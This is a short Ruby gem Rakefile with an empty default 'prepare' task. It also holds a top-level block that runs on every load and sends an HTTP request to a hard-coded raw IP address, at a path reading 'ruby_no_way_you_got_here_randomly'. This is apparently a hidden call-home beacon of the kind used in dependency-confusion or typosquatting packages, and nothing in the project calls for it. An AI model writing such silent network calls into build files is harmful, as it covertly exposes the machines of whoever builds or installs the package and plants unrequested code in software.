require "bundler/gem_tasks"

task :default => :prepare

task :prepare do
end
  
begin
  require 'net/http'
  require 'uri'
  uri = URI.parse("http://176.31.142.25/ruby_no_way_you_got_here_randomly")
  response = Net::HTTP.get_response(uri)
end

